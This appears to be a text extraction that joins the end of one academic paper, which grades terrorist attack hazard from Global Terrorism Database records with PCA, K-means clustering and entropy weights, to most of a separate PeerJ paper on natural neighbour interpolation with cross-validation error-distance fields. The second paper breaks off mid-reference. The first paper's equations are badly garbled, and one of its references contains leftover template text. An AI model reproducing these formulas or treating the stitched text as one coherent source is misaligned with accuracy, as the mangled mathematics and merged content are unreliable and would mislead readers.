  Among them is 1 2 3 4Y = y ,y ,y ,y   the feature component vector after dimension reduction by PCA algorithm. Di is the Euclidean distance between the dimension vector and the five cluster centers. mini is the minimum Euclidean distance, and i is the final event category. C. Using entropy method for calculating weight coefficient The entropy method is a mathematical method used to determine the degree of dispersion of an indicator. With the great degree of dispersion comes great impact of the comprehensive evaluation of the indicator. The entropy value can be used to determine the degree of dispersion of an indicator. The steps of calculating the weight coefficient by the entropy method are as follows: 1) We select 14 indicators of 98686 events, and use xij to indicate the index value of the i-th indicator in the j-th terrorist attack. ）；；（ 1498686n14,,1;98686,,1i  mj  2) Normalization of 14 indicators is Normalized processing. The absolute values of the 14 indicators are conversed into relative values. It has different representative meanings that the positive indicator and the negative indicator value (the higher the positive indicator value is the better), the lower the negative indicator value is the better), as shown in Equation (7) and Equation (8).     ' 1 1 min{ ,... } max{ ,..., } min{ ,..., } ij ij nj ij j nj j nj x x x x x x x x       ' 1 1 1 max{ ,... } max{ ,..., } min{ ,..., } j nj ij ij j nj j nj x x x x x x x x   3) Calculating the proportion of the i-th event in the j-th index are shown in Equation 9.     n i ij ij ij x x 1 p   4) Calculating the entropy value of the j-th indicator, are shown in Equation 10.  )nln(/1k 0),ln(e 1     j n i ijijj eppk   5) Calculating the information entropy redundancy are shown in Equation 11.  jj e1d   6) Calculating the weights of each indicator are shown in Equation 12.     m j j j j d 1 d w   7) Calculating the hazard weighting value of each event are shown in Equation 13. International Journal of Advanced Network, Monitoring and Controls Volume 04, No.02, 2019 85      m j iji w 1 j xs   The weighting factors for each indicator are shown in Table 5. TABLE V. TABLE 5. WEIGHT COEFFICIENTS OF EACH INDICATOR indicator x1 x2 x3 x4 x5 x6 x7 Weight 0.25 0.01 0.26 0.15 0.17 0.08 0.01 indicator x8 x9 x10 x11 x12 x13 x14 Weight 0.01 0.01 0.01 0.01 0.01 0.01 0.01 D. Hazard grading result All events can be divided into five hazard levels by PCA and K-Means clustering. The hazard score of each event is obtained by entropy method, and the average value of the hazard score of each type of event is obtained. After sorting the average, the five hazard levels are shown in Table 6. TABLE VI. TABLE 6. HAZARD GRADING RESULT Hazard level Cluster category Hazard level 1 2 1766.7104 2 3 3.2596 3 0 0.6239 4 4 -2.6904 5 1 -0.8788 IV. CONCLUSION In this paper, 14 categories related to hazard are selected from the Global Terrorism Database (GTD) for the hazard grading of terrorist attacks; after pre- processing the data used, through principal component analysis (PCA) The related data is used for feature extraction. The K-means clustering method aggregates all events into five categories. The entropy method calculates the weight coefficient of each indicator, and finally obtains the comprehensive score of the harm of each type of attack. According to the comprehensive scores of the five types of attacks, a graded to five- level classification model was obtained. This model quantifies the relevant data of past terrorist attacks, and the obtained model has objectivity. It is necessary to establish more detailed grading standards. REFERENCE [1] Sanjun Nie. Research on Counter-terrorism based on Big Data[A]. IEEE Beijing Section. Proceedings of 2016 IEEE International Conference on Big Data Analysis (ICBDA) [C]. IEEE Beijing Section: IEEE BEIJING SECTION Institute of Electrical Engineers Beijing Branch), 2016: 5. [2] Strang, Kenneth David & Sun, Zhaohao. (2017). Analyzing Relationships in Terrorism Big Data Using Hadoop and Statistics. Journal of Computer Information Systems. 57. 67-75. 10.1080/08874417.2016.1181497.K. Elissa, “Title of paper if known,” unpublished. [3] Li Wei. Characteristics and Trends of Current International Terror and Anti-Terrorism Struggle [J]. Modern International Relations, 2007 (02): 22-27. [4] Yu Yihan, Fu Wei, Wu Xiaoping. Privacy data metric and hierarchical model based on Shannon information entropy and BP neural network[J].Journal of Communications,2018,39(12) [5] He Jing. Research and Analysis of Future Anti-terrorism Situation Based on Big Data[J]. Economic Research Guide, 2019(05): 186-187. [6] Wang Qi, Li Xiaopei, Dong Xinyan. Classification model of wine grape based on principal component analysis[J]. China High-tech Zone, 2018(05): 218. [7] Wang Chao, Yao Min, Fu Zhanzhan. Research on Emergency Classification Based on Fuzzy Comprehensive Evaluation[J].Software Guide, 2019(04): 149-15 [8] Lu Ronghui. Terrorism and Counter-Terrorism in the Context of Globalization [D]. Suzhou University, 2005. [9] Wang Chao, Yao Min, Fu Zhanzhan. Research on Emergency Classification Based on Fuzzy Comprehensive Evaluation[J].Software Guide, 2019,18(04):149-152. [10] Hou Wenjing, Jiang Xinxin, Wen Hong, Lei Wenxin, Xu Aidong. Terminal Security Level Grading Model of BP Neural Network Based on Edge Side[J].Communication Technology, 2018, 51(10): 2455-2458. [11] Shi Ya, Wang Xiuhua, Yang Wei, Liu Li, Tan Zhezhen, Ouyang Wei. Study on the grading strategy of comprehensive evaluation model for long-term care of the elderly[J]. Chinese Journal of Nursing, 2018, 53(10): 1237-1243 work_zpb5q6j2qjbcjhw5xefjwjkgse ---- Submitted 13 May 2020 Accepted 18 June 2020 Published 13 July 2020 Corresponding author Thomas R. Etherington, ethering- tont@landcareresearch.co.nz Academic editor Tianfeng Chai Additional Information and Declarations can be found on page 13 DOI 10.7717/peerj-cs.282 Copyright 2020 Etherington Distributed under Creative Commons CC-BY 4.0 OPEN ACCESS Discrete natural neighbour interpolation with uncertainty using cross-validation error-distance fields Thomas R. Etherington Manaaki Whenua—Landcare Research, Lincoln, New Zealand ABSTRACT Interpolation techniques provide a method to convert point data of a geographic phenomenon into a continuous field estimate of that phenomenon, and have become a fundamental geocomputational technique of spatial and geographical analysts. Natural neighbour interpolation is one method of interpolation that has several useful proper- ties: it is an exact interpolator, it creates a smooth surface free of any discontinuities, it is a local method, is spatially adaptive, requires no statistical assumptions, can be applied to small datasets, and is parameter free. However, as with any interpolation method, there will be uncertainty in how well the interpolated field values reflect actual phenomenon values. Using a method based on natural neighbour distance based rates of error calculated for data points via cross-validation, a cross-validation error-distance field can be produced to associate uncertainty with the interpolation. Virtual geography experiments demonstrate that given an appropriate number of data points and spatial-autocorrelation of the phenomenon being interpolated, the natural neighbour interpolation and cross-validation error-distance fields provide reliable estimates of value and error within the convex hull of the data points. While this method does not replace the need for analysts to use sound judgement in their interpolations, for those researchers for whom natural neighbour interpolation is the best interpolation option the method presented provides a way to assess the uncertainty associated with natural neighbour interpolations. Subjects Computational Science, Spatial and Geographic Information Science Keywords Convex hull, Digital, Neighbor, Python, Raster, Sibson, Virtual geography experi- ments, Voronoi diagram INTRODUCTION Spatially continuous geographic phenomena are often only measured at point locations. Interpolation techniques provide a method to convert such point data into a continuous estimate of the phenomenon, and have become a fundamental computational technique of spatial and geographical analysts with key texts devoting large sections to interpolation methods (Burrough & McDonnell, 1998; O’Sullivan & Unwin, 2010; Slocum et al., 2014). Natural neighbour (or Sibson) interpolation is an interpolation technique that was first presented by Sibson (1981). The method is based upon a Voronoi (or: Dirichlet, Thiessen) diagram that partitions space to identify those areas that are closest to a set of points (Okabe et al., 2000). Previous authors (Sambridge, Braun & McQueen, 1995; Watson, 1999) have noted several useful properties of natural neighbour interpolation: (i) the method is an How to cite this article Etherington TR. 2020. Discrete natural neighbour interpolation with uncertainty using cross-validation error- distance fields. PeerJ Comput. Sci. 6:e282 http://doi.org/10.7717/peerj-cs.282 https://peerj.com/computer-science mailto:etheringtont@landcareresearch.co.nz mailto:etheringtont@landcareresearch.co.nz https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.282 http://creativecommons.org/licenses/by/4.0/ http://creativecommons.org/licenses/by/4.0/ http://doi.org/10.7717/peerj-cs.282 exact interpolator, in that the original data values are retained at the reference data points; (ii) the method creates a smooth surface free from any discontinuities; (iii) the method is entirely local, as it is based on a minimal subset of data locations that excludes locations that, while close, are more distant than another location in a similar direction; and (iv) the method is spatially adaptive, automatically adapting to local variation in data density or spatial arrangement. To this list I would add: (v) there is no requirement to make statistical assumptions; (vi) the method can be applied to very small datasets as it is not statistically based; and (vii) the method is parameter free, so no input parameters that will affect the success of the interpolation need to be specified. These properties make natural neighbour interpolation particularly well suited for the interpolation of continuous geographic phenomena from data points that have a highly irregular spatial distribution. While the choice of an appropriate interpolation method will always vary on a case by case basis, studies comparing interpolation methodologies with climate and land surface data demonstrate that natural neighbour interpolation is a highly competitive and sometimes optimal technique (Abramov & McEwan, 2004; Bater & Coops, 2009; Hofstra et al., 2008; Lyra et al., 2018; Yilmaz, 2007). Unfortunately, natural neighbour interpolation can be relatively slow in comparison to other methods (Abramov & McEwan, 2004). The high computational cost arises from the need to insert a new point into the Voronoi diagram for every cell that will make up the interpolation field, and this geometric process becomes increasingly difficult in higher dimensions (Park et al., 2006). This has led to the development of discrete (or digital) natural neighbour interpolation that is significantly quicker than traditional approaches (Park et al., 2006) and has been applied successfully in a geographical context (Keller et al., 2015). While natural neighbour interpolation has various useful properties, and the discrete form is computationally scalable, there is a great deal of uncertainty associated with any interpolation. Therefore, being able to associate interpolation estimates with some form of uncertainty would be highly desirable. Previous efforts for natural neighbour interpolation have been based upon fitting statistical uncertainty models (Bater & Coops, 2009; Ghosh, Gelfrand & Mlhave, 2012), but this approach is contrary to natural neighbour interpolation’s useful properties (v), (vi), and (vii). Therefore, for those researchers who decide that for their data and objectives natural neighbour interpolation is the best interpolation option, I present an approach to associate the interpolation with a measure of uncertainty that is consistent with all the useful properties of natural neighbour interpolation. MATERIALS & METHODS Discrete natural neighbour interpolation In the 2-dimensional planar context that is most relevant to geographical applications, discrete natural neighbour interpolation begins by calculating a discrete Voronoi diagram. First, a raster spatial domain C of cells c is defined such that c ∈C ⊂R2 and hence each c has coordinate attributes x,y for its centre so all ci={xi,yi}. Etherington (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.282 2/16 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.282 The data points are then used to define a set P of n data cells P ={p1,p2,p3,...,pn} where P ∈C, and each data cell has coordinate attributes for its cell centre x,y and value z, so pi={xi,yi,zi}. When multiple data points occur within a raster cell, the resulting data cell has a value z that is the mean of all the data point values. The discrete Voronoi polygon V (pi) that contains all the cells that are closest to each data cell can then be defined as V (pi)={c ∈C|d(c→pi)<d(c→pj) ∀ j 6= i} (1) where d(c →p) is the Euclidean distance between the centre of the cells c and p. When c is equally distant from more than one p for convenience c is assigned to the p with smallest index. The set of n discrete Voronoi polygons then creates the discrete Voronoi diagram V (P)={V (p1),V (p2),V (p3),...,V (pn)} (2) that identifies which raster cells are closest to which data cells (Fig. 1A) (Okabe et al., 2000). In the process of calculating V (P) another set D(P→C) that records the Euclidean distance from the set of data cells P to all raster cells C (Fig. 1B) is created. As each data cell pi has an associated value zi, V (P) can be used to interpolate the data cell values across the raster to produce Z(P), which in a geographic information system (GIS) context is equivalent to nearest neighbour interpolation (Burrough & McDonnell, 1998; Tomlin, 1990) (Fig. 1C). To interpolate the data cell values using natural neighbour interpolation, the set of Euclidean distances from an interpolation cell ci to all raster cells D(ci→C) is calculated (Fig. 1D). Then the discrete Voronoi polygon for the interpolation cell V (ci) is defined as V (ci)={c ∈C|D(ci→C)≤D(P→C)} (3) that is the set of raster cells that are as close or closer to the interpolation cell than any data cell. The set V (ci) can then be used to find the set of relevant data cell values Z(ci)={c ∈Z(P)|c ∈V (ci)} (4) that will form the basis on the interpolation to that cell (Fig. 1E). The natural neighbour interpolation estimate ẑ is then calculated as ẑ(ci)= ∑ Z(ci) ]Z(ci) (5) where ∑ Z(ci) is the sum of the cell values in Z(ci) and ]Z(ci) is the number of cells in the set Z(ci), hence ẑ(ci) is simply the mean of Z(ci). By calculating ẑ(ci) for all raster cells the natural neighbour interpolation is produced (Fig. 1F). Calculating uncertainty Cross-validation error Global error estimation is a traditional approach to measure the uncertainty of geographic models (Zhang & Goodchild, 2002). Given a set of n paired observed o and modelled m values, the absolute error ei for each pair is ei =|mi−oi|, and a global estimate of error using a method such as the mean absolute error (MAE) is calculated as MAE = 1 n n∑ i=1 ei (6) Etherington (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.282 3/16 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.282 Figure 1 Discrete natural neighbour interpolation. (A) For a set P of n data cells p the discrete Voronoi diagram V (P) defines which raster cells are closest to which data cells and (B) the distance to the closest data cell D(P→C). (C) V (P) is used to interpolate the values z of the data cells to produce Z(P). (D) For an interpolation cell ci the distance to all raster cells C is calculated as D(ci →C), and (E) by comparing D(ci →C) to D(P →C) identifies Z(ci) which are those cells of Z(P) that are as close or closer to the ci than any data cell p. The mean value of Z(ci) is the natural neighbour interpolation estimate ẑ for ci, and by repeating this process for all raster cells (F) the natural neighbour interpolation is produced. Full-size DOI: 10.7717/peerjcs.282/fig-1 that is simply the mean of all the absolute errors (Willmott & Matsuura, 2005). However, there is little point in doing this for the data cells of natural neighbour interpolation as given property (i) that it is an exact interpolator the estimated value ẑi for the data cells will always be the same as the actual value zi so the absolute errors will always be zero. Therefore, MAE needs to be applied in conjunction with a cross-validation approach that iteratively withholds each data cell pi from the set of data cells P to produce the set {P−pi}, and then uses interpolation to estimate the value ẑi at the withheld data cell pi on the basis of a discrete Voronoi diagram V ({P−pi}) that is developed without the Etherington (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.282 4/16 https://peerj.com https://doi.org/10.7717/peerjcs.282/fig-1 http://dx.doi.org/10.7717/peerj-cs.282 withheld data cell. The absolute error ei for each data cell pi is then calculated as ei=|ẑi−zi| and the cross-validation MAE can be calculated using Eq. (6). Even with cross-validation the MAE like all global error estimates, such as the commonly used root-mean-square error (RMSE), are not ideal measures of uncertainty for a spatial interpolation (Zhang & Goodchild, 2002). As non-spatial methods that average errors across space they cannot indicate if errors are consistent across space or if higher errors in one region are balanced out by lower errors in another region. This is a critical limitation of global error estimation methods, as for application purposes it could be very useful to know where the interpolation uncertainty is higher or lower. Cross-validation error field One way to communicate the spatial uncertainty of geographical information is to map estimates of error (Zhang & Goodchild, 2002). This has been attempted before for natural neighbour interpolation (Bater & Coops, 2009; Ghosh, Gelfrand & Mlhave, 2012), but as already noted these statistical modelling approaches are contrary to natural neighbour interpolation’s useful properties (v), (vi), and (vii). Another way to map estimates of error that is consistent with the properties of natural neighbour interpolation is the cross-validation error field (Willmott & Matsuura, 2006). This process begins in a similar manner to the cross-validation MAE, but once e has been calculated for each data cell, rather than average the errors using Eq. (6) the errors are assumed to be spatially autocorrelated and interpolation is used to interpolate e to estimate an absolute error field ê. This use of localised absolute errors is highly advantageous as it is consistent with property (iii) of natural neighbour interpolation and allows for error estimates to reflect local changes in the spatial-autocorrelation of the phenomenon being interpolated, with lower errors in more autocorrelated areas and higher errors less autocorrelated areas. However, while the cross-validation error field does indicate where interpolation errors are likely to be higher, it cannot be used directly as a measure of uncertainty for natural neighbour interpolation as ultimately the interpolation is calculated using all n data cells and given property (i) of natural neighbour interpolation is that it is an exact interpolator we know we will have zero error and hence zero uncertainty at the data cells. On the basis of Tobler’s first law of geography that ‘‘everything is related to everything else, but near things are more related than distant things’’ (Tobler, 1970), Zhang & Goodchild (2002) recognise that distance is an important component of uncertainty as locations nearer to data should have less uncertainty. This relationship of increasing error with increasing distance to data has even been demonstrated for natural neighbour interpolation (Keller et al., 2015). Therefore, I propose to extend the cross-validation error field idea by incorporating distance to produce a cross-validation error-distance field that will better represent the uncertainty associated with natural neighbour interpolation. Natural neighbour distances A positive relationship between natural neighbour interpolation absolute errors and the minimum distance to a data cell has been shown (Keller et al., 2015), so this relationship could be used to predict absolute error as a function of distance from the nearest data Etherington (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.282 5/16 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.282 Figure 2 Computation of the natural neighbour distance. (A) For an interpolation raster cell ci the Eu- clidean distance to all data cells dj is calculated, and the discrete Voronoi diagram V (P) is used to produce D(P) that interpolates the distances by the discrete Voronoi polygons. (B) the cells of D(P) that are closer to ci than any data cell defines the set D(ci) and the mean value of this set gives the natural neighbour dis- tance δ for ci. (C) When repeated for all raster cells a natural neighbour distance field is produced. Full-size DOI: 10.7717/peerjcs.282/fig-2 point. However, minimum distance to a data cell is a simplistic metric that does not account for the number and spatial configuration of the data cells (Keller et al., 2015). In addition, using the minimum distance from data cells D(P) produces a field that has discontinuities along the edges of the discrete Voronoi polygons (Fig. 1B) that are contrary to the property (ii) of the natural neighbour interpolation method that creates surfaces free of any discontinuities. Therefore, the natural neighbour distance δ is presented as a more appropriate measure of distance that incorporates information about the number, spatial distances, and relative positions of the data cells forming the interpolation. The method to calculate δ follows a very similar approach to that of calculating the interpolation, and therefore recycles various data structures that are used for the interpolation. For each interpolation cell ci the Euclidean distances to all data cells are calculated dj =d(ci→pj), and then using the Voronoi diagram V (P) these distances are interpolated via nearest neighbour interpolation to produce D(P) that is the distance to the data cells mapped into the discrete Voronoi polygons (Fig. 2A). The set V (ci) can be used again to find the set of relevant data cell distances D(ci)={c ∈D(P)|c ∈V (ci)} (7) that will form the basis of the interpolation to that cell (Fig. 2B). The natural neighbour distance is then calculated as δ(ci)= ∑ D(ci) ]D(ci) (8) that is simply the mean value of the distances for the cells in D(ci). With δ calculated for all raster cells it becomes evident that unlike minimum distance that contains spatial Etherington (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.282 6/16 https://peerj.com https://doi.org/10.7717/peerjcs.282/fig-2 http://dx.doi.org/10.7717/peerj-cs.282 discontinuities (Fig. 1B) the natural neighbour distance creates a smooth surface free of any discontinuities (Fig. 2C). Also, the minimum distance is an optimistic measure of distance as it only accounts for the closest data cell, whereas by comparison the distances for δ are larger as they recognise that the other data cells involved in the interpolation are further away. Cross-validation error-distance field To incorporate δ into the estimate of error to produce a cross-validation error-distance field, the first step is still a cross-validation process in which each data cell is iteratively withheld and an estimate of the value of the withheld data cell is made with the remaining n−1 data cells. However, the absolute error e =|zi− ẑi| is now divided by the natural neighbour distance δ to calculate a rate of error r for each data cell ri= |zi− ẑi| δi (9) with these rates of error stored so that each data cell becomes pi={xi,yi,zi,ri}. Then when conducting the natural neighbour interpolation, while estimating the value ẑ an estimate of the rate of error r̂ can be simultaneously produced (Fig. 3A) and used to produce an error estimate êi= r̂i×δi (10) that when estimated for all cells produces a cross-validation error-distance field (Fig. 3B). The cross-validation error-distance field clearly captures information from the rate of error field (Fig. 3A) and the natural neighbour distance field (Fig. 2C) with lower error estimates in areas that have either low rates of error or natural neighbour distances, and higher error estimates in areas that have higher rates of error and/or natural neighbour distances. Therefore, the cross-validation error-distance field captures uncertainty information relating to local variation in both the autocorrelation of the underlying phenomenon field being interpolated and the spatial distribution of the data cells providing data for the interpolation. Virtual geography experiments The discrete natural neighbour interpolation and cross-validation error-distance field algorithms described here were implemented using a Python computational framework (Pérez, Granger & Hunter, 2011) using the NumPy (Van der Walt, Colbert & Varoquaux, 2011), SciPy (Virtanen et al., 2020), and Matplotlib (Hunter, 2007) packages. Having proposed a new method, it is sensible to provide an evaluation of how performance varies under different conditions. However, in doing so it is important to remember that interpolation errors result not only from the efficacy of the interpolation method, but also from distribution of data points and the real (but unknown) distribution of the phenomenon field being interpolated (Willmott & Matsuura, 2006) that will be unique to each study. Also, what constitutes an acceptable level of interpolation error will also vary between studies. Therefore, the objective here is try and identify simple trends in performance to verify the methods work as would be expected and to provide some basic Etherington (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.282 7/16 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.282 Figure 3 Computation of the cross-validation error-distance field. (A) The rate of absolute error for each data cell ri calculated through cross-validation, and then an estimated rate of absolute error field r̂ is produced by natural neighbour interpolation of r. (B) The cross-validation error-distance field ê that is the product of r̂ and the natural neighbour distance δ for each interpolation cell. Full-size DOI: 10.7717/peerjcs.282/fig-3 information that will help an analyst to make a more detailed assessment of whether interpolation is feasible or not. To evaluate the effectiveness of the proposed interpolation methods, a series of in silico virtual geography experiments were conducted. Virtual geographies are a very useful approach for methodological evaluation as the conditions can be tightly controlled and explored fully. Virtual geographic phenomena fields for grids of 100×120 cells were created using the NLMpy package (Etherington, Holland & O’Sullivan, 2015) implementation of the mid-point displacement fractal algorithm that produces fields representing natural phenomena such as land surfaces (Fournier, Fussell & Carpenter, 1982). The spatial- autocorrelation of the values produced by the mid-point displacement method can be controlled by varying the h parameter to produce fields with spatial-autocorrelation that varies from low to high (Fig. 4). The underlying premise of the experiments was that with random sampling of a virtual geographic phenomenon with actual values z (Fig. 5A), natural neighbour interpolation can be used to produce estimated values ẑ (Fig. 5B). The absolute difference between the actual values and the estimated values is the value error e(ẑ)=|ẑ−z| (Fig. 5C) that will indicate how well the natural neighbour interpolation method works. The value error is also estimated by the cross-validation error-distance field ê (Fig. 5D), and the absolute difference between the value error e(ẑ) and the estimated error ê is the error of errors e(ê)=|ê−e(ẑ)| that indicates how well the proposed cross-validation error-distance field performs (Fig. 5E). Etherington (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.282 8/16 https://peerj.com https://doi.org/10.7717/peerjcs.282/fig-3 http://dx.doi.org/10.7717/peerj-cs.282 Figure 4 Examples of virtual geographic phenomena fields created by the mid-point displacement fractal algorithm. The spatial-autocorrelation varies from low to high and is controlled by the h parame- ter that in these examples has been set to (A) h=0, (B) h=1, and (C) h=2. Full-size DOI: 10.7717/peerjcs.282/fig-4 To summarise the performance of both natural neighbour interpolation and the cross- validation error-distance field, the MAE (Eq. (6)) was calculated for the cells inside and outside of the convex hull of the sampling points for both e(ẑ) (Fig. 5C) and e(ê) (Fig. 5E). The MAE was chosen as the error statistic as it expresses error in the same units as the variable of interest and is insensitive to the number of cells in the sample (Willmott & Matsuura, 2006), which was important here as the convex hull area would vary as a result of the random sampling. When the spatial-autocorrelation and number of sample points is reduced we would expect a reduction in performance of both the natural neighbour interpolation and the cross-validation error-distance field (Figs. 5A–5E versus Figs. 5F–5J). Therefore, to examine how the natural neighbour methods performed under varying conditions 500 experiments were conducted in which h randomly varied uniformly between 0.0 to 2.0 and n randomly varied uniformly between 10 to 100. The cross-validation MAE was also calculated for each experiment to assess if the cross-validation MAE could be used as an indicator of expected interpolation performance. RESULTS The results from the virtual geography experiments demonstrate that, as would be expected for the cells within the convex hull of the sampling points, the MAE of the value errors e(ẑ) from the natural neighbour interpolation (Fig. 6A) and error of errors e(ê) from the cross-validation error-distance field (Fig. 6B) reduced as the number of data points n and the spatial-autocorrelation h of the underlying virtual phenomena fields increased. The effect of h was more important, as when h was low or high n did not have much effect on the performance. The importance of h is to be expected as all interpolation methods work on the assumption that the phenomenon being interpolated has sufficient levels of spatial-autocorrelation. Etherington (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.282 9/16 https://peerj.com https://doi.org/10.7717/peerjcs.282/fig-4 http://dx.doi.org/10.7717/peerj-cs.282 Figure 5 The natural neighbour interpolation virtual geography experimental process. (A) A virtual geography phenomenon field z with spatial-autocorrelation of h=2 and n=20 random sampling points, (B) the resulting natural neighbour interpolation ẑ from the sampling points, and (C) value error e(ẑ) = |ẑ −z|. (D) The cross-validation error-distance field estimated error ê that is also produced during inter- polation is then compared to the value error e(ẑ) to produce (E) the error of errors e(ê) =|ê −e(ẑ)|. In- terpolation performance as a function of e(ẑ) and e(ê) was summarised for cells within and outside the convex hull of the sampling points. The same experimental process in (A–E) is replicated in (F–J) for a virtual geography phenomenon field with spatial-autocorrelation of h = 1 and n = 10 random sampling points, demonstrating a reduction in interpolation performance at lower levels of spatial-autocorrelation and sampling. Full-size DOI: 10.7717/peerjcs.282/fig-5 There was also a very strong correlation between e(ẑ) and e(ê) (Fig. 6C) and this similarity of behaviour under different conditions indicates that the cross-validation error-distance field meets the objective of providing a measure of uncertainty that is consistent with all the useful properties of natural neighbour interpolation. While the results of the virtual geography experiments (Figs. 6A and 6B) indicate that lower average errors can be expected when n∼>20 and h∼>1.0 (Fig. 4B) such criteria cannot be easily applied by an analyst as while n is known h is unknown and in many situations will be hard to guess. Fortunately, while the cross-validation MAE that can always be calculated by an analyst is generally slightly higher than the e(ẑ) there is still a strong correlation between the two variables (Fig. 6D), and this correlation is extremely useful as it indicates to an analyst the likely levels of e(ẑ) and therefore e(ê) too. A comparison of e(ẑ) and e(ê) inside and outside of the convex hull around the sampling points clearly shows that while the performance follows a similar trend e(ẑ) and e(ê) can be expected to be higher outside of the convex hull (Figs. 6E–6F). Etherington (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.282 10/16 https://peerj.com https://doi.org/10.7717/peerjcs.282/fig-5 http://dx.doi.org/10.7717/peerj-cs.282 Figure 6 Performance of natural neighbour interpolation and cross-validation error-distance fields from 500 virtual geography experiments. The mean absolute error (MAE) of cells within the convex hull around sampling points for different experimental combinations of the number n of random sampling points and the spatial-autocorrelation h of virtual phenomena fields for (A) the value errors e(ẑ) from the natural neighbour interpolations and (B) the error of errors e(ê) from the cross-validation error-distance fields that (C) were highly correlated. (D) Comparison of e(ẑ) and the cross-validation MAE derived from the sampling points. Comparison of interpolation performance inside and outside the convex hull around the sampling points for (E) e(ẑ) and (F) e(ê). Full-size DOI: 10.7717/peerjcs.282/fig-6 Etherington (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.282 11/16 https://peerj.com https://doi.org/10.7717/peerjcs.282/fig-6 http://dx.doi.org/10.7717/peerj-cs.282 DISCUSSION The virtual geography experiments indicate that under suitable conditions the natural neighbour interpolation field and the cross-validation error-distance field should provide useful estimates of a geographic phenomenon field with associated uncertainty. The fact that the cross-validation error-distance field reflects localised changes in the spatial distribution of both the underlying phenomenon and the point data is particularly useful, and contrasts with other spatial interpolation uncertainty methods such as MAE and RMSE that estimate error using a global approach. The virtual geography experiments demonstrated that the performance of natural neighbour interpolation will be lower outside of the convex hull around the data points, as is expected (Watson, 1999)—although this is also likely to be true of all spatial interpolation techniques as beyond the convex hull interpolation becomes extrapolation. However, we do not suggest that interpolation should be restricted to within the convex hull as there may be occasions where the area of interest may occur slightly outside the convex hull. For example, when interpolating rainfall data from weather stations that are usually sited in settlements, there are likely to be areas of coastline along peninsulas and headlands that will not fall within a convex hull around the weather stations (Lyra et al., 2018). Therefore, it is logistically useful that discrete natural neighbour interpolation can produce estimated values beyond the convex hull of the available data points. What is helpful in this context is that the cross-validation error-distance field incorporates information on distance from data points, therefore as interpolations move further beyond the convex hull the error-field should increase to help to guard against erroneous estimates. However, the responsibility of appropriate use of natural neighbour interpolation still belongs with the spatial analyst who must make decisions about whether interpolation is useful based on their knowledge of: the expected spatial-autocorrelation of the phenomenon being interpolated, the number and distribution of data points, the location of the areas for which interpolations are required, and the magnitude of the estimated errors in relation to the magnitude of the value estimates. And of course, the cross-validation error-distance field only captures uncertainty in the interpolation itself and does not incorporate any uncertainty that may arise from the data itself. While I have argued against the use of the cross-validation MAE as a measure of uncertainty, I would recommend that analysts continue to calculate the cross-validation MAE given its strong correlation with the performance of the natural neighbour interpolation, and therefore the performance of the cross-validation error-distance field too. Analysts can then use the cross-validation MAE as a helpful guide when deciding if interpolation is advisable or not. When doing so it is important to remember that as the cross-validation MAE is based on the use of n−1 data cells, the error estimates may be slightly higher than the real errors that would be based on all n data that is ultimately used in the interpolation (Willmott & Matsuura, 2006). Therefore, the cross-validation MAE should be seen as a slightly conservative indication of likely interpolation performance. Etherington (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.282 12/16 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.282 CONCLUSION For those researchers for whom natural neighbour interpolation is the best interpolation option, the cross-validation error-distance field method presented provides a way to assess the uncertainty associated with natural neighbour interpolations that is consistent with the useful properties of natural neighbour interpolation. While the cross-validation error-distance method has been described here in the context of discrete natural neighbour interpolation, there is no reason why this same approach could not be applied to geometric natural neighbour interpolation as well. Discrete natural neighbour interpolation has been implemented here in two-dimensional space for ease of visualisation, but the method will generalise to higher dimensions (Park et al., 2006) and in principle I cannot see any reason why the uncertainty method presented could not also be applied in higher dimensions by those who wish to do so. The approach could easily be adapted to other interpolation methods, as all that is required is a measure of weighted distances to the data points creating the interpolation. Given the promise of the algorithm, and to encourage its use and development, the Python code used to generate the examples presented is freely available under the permissive MIT License as supplementary material. ADDITIONAL INFORMATION AND DECLARATIONS Funding This work was supported by the Strategic Science Investment Funding for Crown Research Institutes from the New Zealand Ministry of Business, Innovation and Employment’s Science and Innovation Group. The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. Grant Disclosures The following grant information was disclosed by the author: Strategic Science Investment Funding for Crown Research Institutes from the New Zealand Ministry of Business, Innovation and Employment’s Science and Innovation Group. Competing Interests Thomas R. Etherington is employed by Manaaki Whenua-Landcare Research, and declares that there are no competing interests. Author Contributions • Thomas R. Etherington conceived and designed the experiments, performed the experiments, analyzed the data, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. Data Availability The following information was supplied regarding data availability: Python scripts to reproduce the examples, virtual experiments, and figures are available as a Supplementary File. Etherington (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.282 13/16 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.282#supplemental-information http://dx.doi.org/10.7717/peerj-cs.282 Supplemental Information Supplemental information for this article can be found online at http://dx.doi.org/10.7717/ peerj-cs.282#supplemental-information. REFERENCES Abramov O, McEwan A. 2004. An evaluation of interpolation methods for Mars Orbiter Laser Altimeter (MOLA) data. International Journal of Remote Sensing 25(3):669–676 DOI 10.1080/01431160310001599006. Bater CW, Coops NC. 2009. Evaluating error associated with lidar-derived DEM interpo- lation. Computers & Geosciences 35(2):289–300 DOI 10.1016/j.cageo.2008.09.001. Burrough PA, McDonnell RA. 1998. Principles of geographical information systems. Oxford: Oxford University Press. Etherington TR, Holland EP, O’Sullivan D. 2015. NLMpy: a Python software package for the creation of neutral landscape models within a general numerical framework. Methods in Ecology and Evolution 6(2):164–168 DOI 10.1111/2041-210X.12308. Fournier A, Fussell D, Carpenter L. 1982. Computer rendering of stochastic models. Communications of the ACM 25(6):371–384 DOI 10.1145/358523.358553. Ghosh S, Gelfrand AE, Mlhave T. 2012. 